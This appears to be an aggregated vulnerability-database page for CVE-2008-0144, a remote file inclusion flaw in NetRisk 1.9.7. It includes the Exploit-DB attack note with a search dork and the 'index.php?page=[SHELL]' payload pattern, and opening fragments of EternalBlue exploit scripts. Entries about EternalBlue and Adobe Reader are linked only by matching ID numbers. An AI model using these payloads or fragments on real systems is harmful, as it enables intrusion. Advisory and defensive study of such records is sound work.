CVE-2008-0144
published 2008-01-08CVE-2008-0144: PHP remote file inclusion vulnerability in index.php in NetRisk 1.9.7 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the page…
PriorityP349high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
44.84%
98.6th percentile
PHP remote file inclusion vulnerability in index.php in NetRisk 1.9.7 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the page parameter. NOTE: this can also be leveraged for local file inclusion using directory traversal sequences.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| phprisk | netrisk | <= 1.9.7 | — |
| phprisk | netrisk | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-7rrf-98rx-8v5m: PHP remote file inclusion vulnerability in index
ghsa_unreviewed·2022-05-01
CVE-2008-0144 [HIGH] CWE-89 GHSA-7rrf-98rx-8v5m: PHP remote file inclusion vulnerability in index
PHP remote file inclusion vulnerability in index.php in NetRisk 1.9.7 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the page parameter. NOTE: this can also be leveraged for local file inclusion using directory traversal sequences.
GHSA
GHSA-xg85-49cx-w236: Cross-site scripting (XSS) vulnerability in index
ghsa_unreviewed·2022-05-01·CVSS 7.5
CVE-2008-0186 [HIGH] CWE-79 GHSA-xg85-49cx-w236: Cross-site scripting (XSS) vulnerability in index
Cross-site scripting (XSS) vulnerability in index.php in NetRisk 1.9.7 and possibly earlier allows remote attackers to inject arbitrary web script or HTML via the page parameter, possibly related to CVE-2008-0144.
No detection rules found.
Exploit-DB
Microsoft Windows 7/8.1/2008 R2/2012 R2/2016 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010)
exploitdb·2017-07-11
CVE-2017-0144 Microsoft Windows 7/8.1/2008 R2/2012 R2/2016 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010)
Microsoft Windows 7/8.1/2008 R2/2012 R2/2016 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010)
---
#!/usr/bin/python
from impacket import smb, smbconnection
from mysmb import MYSMB
from struct import pack, unpack, unpack_from
import sys
import socket
import time
'''
MS17-010 exploit for Windows 2000 and later by sleepya
EDB Note: mysmb.py can be found here ~ https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42315.py
Note:
- The exploit should never crash a target (chance should be nearly 0%)
- The exploit use the bug same as eternalromance and eternalsynergy, so named pipe is needed
Tested on:
- Windows 2016 x64
- Windows 10 Pro Build 10240 x64
- Windows 2012 R2 x64
- Windows 8.1 x64
- Windows 2008 R2 SP1 x64
- Windows 7 SP1 x64
- Windows 2008 SP1
Exploit-DB
Microsoft Windows 7/2008 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010)
exploitdb·2017-05-17
CVE-2017-0144 Microsoft Windows 7/2008 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010)
Microsoft Windows 7/2008 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010)
---
#!/usr/bin/python
from impacket import smb
from struct import pack
import sys
import socket
'''
EternalBlue exploit for Windows 7/2008 by sleepya
The exploit might FAIL and CRASH a target system (depended on what is overwritten)
EDB Note: Shellcode
- x64 ~ https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42030.asm
- x86 ~ https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42031.asm
Tested on:
- Windows 7 SP1 x64
- Windows 2008 R2 SP1 x64
- Windows 7 SP1 x86
- Windows 2008 SP1 x64
- Windows 2008 SP1 x86
Reference:
- http://blogs.360.cn/360safe/2017/04/17/nsa-eternalblue-smb/
Bug detail:
- For the buffer overflow bug detail, please see htt
Exploit-DB
NetRisk 1.9.7 - Local/Remote File Inclusion
exploitdb·2008-01-04
CVE-2008-0144 NetRisk 1.9.7 - Local/Remote File Inclusion
NetRisk 1.9.7 - Local/Remote File Inclusion
---
#########################################################################
NetRisk <= 1.9.7 Remote/Local File Inclusion Vulnerability #
#########################################################################
AUTHOR : S.W.A.T. #
HOME : http://svvat.ir #
Download : http://phprisk.org/netrisk_1.9.7.zip #
#########################################################################
DorKs : inurl:index.php?page=gamebrowser #
#########################################################################
## EXPLOIT : #
http://server.com/Path/index.php?page=[SHELL] #
http://server.com/Path/index.php?page=[-LFI-] #
#########################################################################
## GREETZ : Str0ke - Dj7xpl - DarKLiFe - NazNazi - XmorsTEAM #
#######
Bugzilla
CVE-2008-0726 Acroread memory corruption
bugzilla·2008-02-14·CVSS 9.3
CVE-2008-0726 [CRITICAL] CVE-2008-0726 Acroread memory corruption
CVE-2008-0726 Acroread memory corruption
Common Vulnerabilities and Exposures assigned an identifier CVE-2008-0726 to the following vulnerability:
Integer overflow in Adobe Reader and Acrobat 8.1.1 and earlier allows remote attackers to execute arbitrary code via crafted arguments to the printSepsWithParams, which triggers memory corruption.
References:
http://www.zerodayinitiative.com/advisories/ZDI-08-004.html
http://www.adobe.com/support/security/advisories/apsa08-01.html
Discussion:
This issue was addressed in:
Red Hat Enterprise Linux Extras:
http://rhn.redhat.com/errata/RHSA-2008-0144.html
---
Reporter changed to [email protected] by request of Jay Turner.
Bugzilla
CVE-2007-5666 acroread JavaScript Insecure Libary Search Path
bugzilla·2008-02-13·CVSS 6.2
CVE-2007-5666 [MEDIUM] CVE-2007-5666 acroread JavaScript Insecure Libary Search Path
CVE-2007-5666 acroread JavaScript Insecure Libary Search Path
Common Vulnerabilities and Exposures assigned an identifier CVE-2007-5666 to the following vulnerability:
Untrusted search path vulnerability in Adobe Reader and Acrobat 8.1.1 and earlier allows local users to execute arbitrary code via a malicious Security Provider library in the reader's current working directory. NOTE: this issue might be subsumed by CVE-2008-0655.
References:
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=655
http://www.adobe.com/support/security/advisories/apsa08-01.html
Discussion:
This issue was addressed in:
Red Hat Enterprise Linux Extras:
http://rhn.redhat.com/errata/RHSA-2008-0144.html
---
Reporter changed to [email protected] by request of Jay Turner.
Bugzilla
CVE-2007-5663 acroread JavaScript Insecure Method Exposure
bugzilla·2008-02-13·CVSS 9.3
CVE-2007-5663 [CRITICAL] CVE-2007-5663 acroread JavaScript Insecure Method Exposure
CVE-2007-5663 acroread JavaScript Insecure Method Exposure
Common Vulnerabilities and Exposures assigned an identifier CVE-2007-5663 to the following vulnerability:
Adobe Reader and Acrobat 8.1.1 and earlier allows remote attackers to execute arbitrary code via a crafted PDF file that calls an insecure JavaScript method in the EScript.api plug-in. NOTE: this issue might be subsumed by CVE-2008-0655.
References:
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=656
http://www.adobe.com/support/security/advisories/apsa08-01.html
http://www.kb.cert.org/vuls/id/140129
Discussion:
This issue was addressed in:
Red Hat Enterprise Linux Extras:
http://rhn.redhat.com/errata/RHSA-2008-0144.html
---
Reporter changed to [email protected] by request of Jay Tu
Bugzilla
CVE-2007-5659 acroread Multiple buffer overflows
bugzilla·2008-02-13·CVSS 7.8
CVE-2007-5659 [HIGH] CVE-2007-5659 acroread Multiple buffer overflows
CVE-2007-5659 acroread Multiple buffer overflows
Common Vulnerabilities and Exposures assigned an identifier CVE-2007-5659 to the following vulnerability:
Multiple buffer overflows in Adobe Reader and Acrobat 8.1.1 and earlier allow remote attackers to execute arbitrary code via a PDF file with long arguments to unspecified JavaScript methods. NOTE: this issue might be subsumed by CVE-2008-0655.
References:
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=657
http://www.adobe.com/support/security/advisories/apsa08-01.html
Discussion:
This issue was addressed in:
Red Hat Enterprise Linux Extras:
http://rhn.redhat.com/errata/RHSA-2008-0144.html
---
Reporter changed to [email protected] by request of Jay Turner.
http://marc.info/?l=bugtraq&m=119955114428283&w=2http://secunia.com/advisories/28328http://www.securityfocus.com/bid/27136https://exchange.xforce.ibmcloud.com/vulnerabilities/39419https://www.exploit-db.com/exploits/4833http://marc.info/?l=bugtraq&m=119955114428283&w=2http://secunia.com/advisories/28328http://www.securityfocus.com/bid/27136https://exchange.xforce.ibmcloud.com/vulnerabilities/39419https://www.exploit-db.com/exploits/4833
2008-01-08
Published